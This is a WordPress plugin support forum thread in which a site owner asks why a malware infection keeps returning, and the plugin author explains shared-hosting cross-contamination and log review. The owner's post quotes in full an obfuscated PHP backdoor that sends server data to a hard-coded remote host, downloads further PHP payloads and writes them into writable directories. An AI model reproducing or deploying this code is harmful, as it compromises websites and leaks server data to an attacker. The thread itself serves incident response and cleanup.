How to Identify & Prevent Future Threat?

  • Resolved shayeryan

    (@shayeryan)


    4 years, 1 month ago

    Great plugin, it has detected and help me remove the malicious code from my site…however, the infection keeps coming back, even after hardening my site.

    How do I use the plugin to identify what the threat actually is? This might help me identify where the hole in my security is.

    Steps I’ve performed:
    -Reinstalling WP Core
    -Reinstalling all Plugins
    -Reinstalling theme
    -WordFence scan and deleting or repairing infected files
    -Changing passwords for WP and database
    -Looking for hidden accounts in the database
    -Changing FTP passwords-Removing unauthorized FTP accounts

    Here is the malicious code I’m finding in multiple files:
    <?php if(!isset($incode)){$vl='h';$serverid='0bdf5b6877cf16717e02642fc9fc250d';$server_addr='219.95.83.119';function o0($oo0o,$oo,$oo0,$oO,$oOo,$ooooO){$o0oo0='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0';if(ini_get('allow_url_fopen')==1){$o000=stream_context_create(array($ooooO=>array('method'=>'POST','timeout'=>$oOo,'header'=>array('Content-type: application/x-www-form-urlencoded','User-Agent: '.$o0oo0,'content'=>http_build_query($_SERVER)))));if($oO=='yes'){$oo0o=$oo0o.'&type=fopen';}$ooo=@file_get_contents($oo0o,false,$o000);}elseif(in_array('curl',get_loaded_extensions())){if($oO=='yes'){$oo0o=$oo0o.'&type=curl';}$oo00O=curl_init();curl_setopt($oo00O,CURLOPT_URL,$oo0o);curl_setopt($oo00O,CURLOPT_HEADER,false);curl_setopt($oo00O,CURLOPT_RETURNTRANSFER,true);curl_setopt($oo00O,CURLOPT_TIMEOUT,$oOo);curl_setopt($oo00O,CURLOPT_USERAGENT,$o0oo0);if($ooooO=='https'){curl_setopt($oo00O,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($oo00O,CURLOPT_SSL_VERIFYHOST,false);}curl_setopt($oo00O,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($oo00O,CURLOPT_POSTFIELDS,http_build_query($_SERVER));$ooo=@curl_exec($oo00O);curl_close($oo00O);}else{if($oO=='yes'){$oo0=$oo0.'&type=socks';}if($ooooO=='https'){$ooO=fsockopen('ssl://'.$oo,443,$o0Ooo,$oO0,$oOo);}else{$ooO=fsockopen($oo,80,$o0Ooo,$oO0,$oOo);}if($ooO){stream_set_timeout($ooO,$oOo);$oO0Oo=http_build_query($_SERVER);$o0O='POST '.$oo0.' HTTP/1.0'."\r\n";$o0O.='Host: '.$oo."\r\n";$o0O.='User-Agent: '.$o0oo0."\r\n";$o0O.='Content-Type: application/x-www-form-urlencoded'."\r\n";$o0O.='Content-Length: '.strlen($oO0Oo)."\r\n\r\n";fwrite($ooO,$o0O);fwrite($ooO,$oO0Oo);$oooO='';while(!feof($ooO)){$oooO.=fgets($ooO,4096);}fclose($ooO);list($ooOO,$oO0oo)=@preg_split("/\R\R/",$oooO,2);$ooo=$oO0oo;}}return$ooo;}function ooO($o0OO){$o0oo[0]=(int)($o0OO/256/256/256);$o0oo[1]=(int)(($o0OO-$o0oo[0]*256*256*256)/256/256);$o0oo[2]=(int)(($o0OO-$o0oo[0]*256*256*256-$o0oo[1]*256*256)/256);$o0oo[3]=$o0OO-$o0oo[0]*256*256*256-$o0oo[1]*256*256-$o0oo[2]*256;return''.$o0oo[0].".".$o0oo[1].".".$o0oo[2].".".$o0oo[3];}function o0O00($o0o0){$o0Oo=array();$o0Oo[]=$o0o0;foreach(scandir($o0o0) as$oo00){if($oo00=='.'||$oo00=='..'){continue;}$oOO0=$o0o0.DIRECTORY_SEPARATOR.$oo00;if(is_dir($oOO0)){$o0Oo[]=$oOO0;$o0Oo=array_merge($o0Oo,o0O00($oOO0));}}return$o0Oo;}$oOoo=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oo=ooO('3104709758');$oo0='/get.php?spider&checkdomain&host='.$oOoo.'&serverid='.$serverid.'&stookfile='.__FILE__;$oo0o='https://'.$oo.'/get.php?spider&checkdomain&host='.$oOoo.'&serverid='.$serverid.'&stookfile='.__FILE__;$oo0OO=o0($oo0o,$oo,$oo0,$oO='no',$oOo='30',$ooooO='http');if($oo0OO!='havedoor|havedonor'){$o0=$_SERVER['HTTP_HOST'];$oo0O=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oO00=$_SERVER['DOCUMENT_ROOT'];chdir($oO00);$o0Oo=o0O00($oO00);$o0Oo=array_unique($o0Oo);foreach($o0Oo as$oo00){if(is_dir($oo00)&&is_writable($oo00)){$o0O0o=explode(DIRECTORY_SEPARATOR,$oo00);$oOo0=count($o0O0o);$oOoOo[]=$oOo0.'|'.$oo00;}}$oOo0=0;foreach($oOoOo as$ooo0){if(count($oOoOo)>1&&(strstr($ooo0,'/wp-admin')||strstr($ooo0,'/cgi-bin'))){unset($oOoOo[$oOo0]);}$oOo0++;}if(!is_writable($oO00)){natsort($oOoOo);$oOoOo=array_values($oOoOo);$ooo0=explode('|',$oOoOo[0]);$ooo0=$ooo0[1];}else{$ooo0=$oO00;}chdir($ooo0);if(stristr($oo0OO,'nodoor')){$oo0o='https://'.$oo.'/get.php?vl='.$vl.'&update&needfilename';$oo0='/get.php?vl='.$vl.'&update&needfilename';$o0o=o0($oo0o,$oo,$oo0,$oO='no',$oOo='55',$ooooO='http');$oo0oO=explode('|||||',$o0o);$oOoOO=$oo0oO[0].'.php';$o00o=$oo0oO[1];file_put_contents($ooo0.DIRECTORY_SEPARATOR.$oOoOO,$o00o);$o00=str_replace($oO00,'',$ooo0);if($_SERVER['SERVER_PORT']=='443'){$ooooO='https';}else{$ooooO='http';}$oo0o=$ooooO.'://'.$o0.$o00.'/'.$oOoOO.'?gen&serverid='.$serverid;$oo0=$o00.'/'.$oOoOO.'?gen&serverid='.$serverid;$ooOoO=o0($oo0o,$o0,$oo0,$oO='no',$oOo='55',$ooooO);}elseif(stristr($oo0OO,'needtoloadsomefiles')){shuffle($oOoOo);$ooo0=explode('|',$oOoOo[0]);$ooo0=$ooo0[1];$o00=str_replace($oO00,'',$ooo0);$o0oO='stuvwxyz';$oOoOO=str_shuffle($o0oO).'.php';$ooOo=urlencode($ooooO.'://'.$o0.$o00.'/'.$oOoOO);$oo0o='https://'.$oo.'/get.php?bdr&url='.$ooOo;$oo0='/get.php?bdr&url='.$ooOo;$ooo=o0($oo0o,$oo,$oo0,$oO='no',$oOo='20',$ooooO='http');file_put_contents($ooo0.DIRECTORY_SEPARATOR.$oOoOO,$ooo);}elseif(stristr($oo0OO,'needtoloadclient')){$oo0o='https://'.$oo.'/get.php?getclient&domain='.$oo0O;$oo0='/get.php?getclient&domain='.$oo0O;$ooo=o0($oo0o,$oo,$oo0,$oO='no',$oOo='55',$ooooO='http');if($ooo!='noclient'){$oOO0o=explode('::::',$ooo);$ooO0=$oOO0o[0];$ooOOO=$oOO0o[1];if(file_exists($ooO0)){if(!is_writable($ooO0)){@chmod($ooO0,'0644');@file_put_contents($ooO0,$ooOOO);if(!is_writable($ooO0)){@unlink($ooO0);@file_put_contents($ooO0,$ooOOO);}}else{@file_put_contents($ooO0,$ooOOO);}}else{@file_put_contents($ooO0,$ooOOO);}}}elseif($oo0OO=='needtowait'){}if(stristr($oo0OO,'nodonor')){}}$incode=1;}?><?php

    • This topic was modified 4 years, 1 month ago by shayeryan.
Viewing 1 replies (of 1 total)
  • Plugin Author Eli

    (@scheeeli)

    That code that you keep finding is already in my latest definitions so my plugin is removing it whenever you run the Complete Scan. The problem you are still facing is that this infection keeps coming back no matter how many times you remove it, is that about right?

    I see that you have taken some very thorough steps to secure your site, but one area that you have not covered here is your hosting environment. I am guessing that this site is on a shared hosting account and the biggest security vulnerability on any shared hosting server is cross-contamination from other infected sites. No matter how good a job you do locking down the security on your site it only take one back-door on any other site on that server to leave you wide open to another infection. Once a malicious script has been planted on any site that has access to the same file-system that your site is hosted on then that script can copy itself to your site and all the other sites on that server. In actual practice they usually don’t infect every single site on the server because then the hosting provider would have to take responsibility for the breech and clean it all up with some enterprise malware solution so these kind of scripts usually just focus on a smaller subset of the site that they feel they can get away with, and we may never know why they have selected your site as one of the site that they are picking on.

    It is also likely that they have planted other back-doors on your site so that they can get back into the server through you if the other security hole gets plugged up. For this reason it is important to review your access_log files after each scan that reveals more infected files. You can get the exact infection time of each of the files that you clean using my plugin by reviewing the Anti-Malware Quarantine after the automatic fix is performed. The Quarantine log times are in GMT and your access_log files might be in the server’s local time-zone so make sure to correct for that when you are looking up those time in your logs. If you find any suspicious URLs being call up on your site at the exact time of the latest infections then you my be able find more scripts that are responsible for spreading this threat around.

    If you cannot find anything else on your site and these infection keep coming back despite all your work to secure your site then you might need to look into moving your site to a more secure hosting environment.

    Please let me know if you find anything new or if you need any more help.

    Aloha, Eli

Viewing 1 replies (of 1 total)
  • The topic ‘How to Identify & Prevent Future Threat?’ is closed to new replies.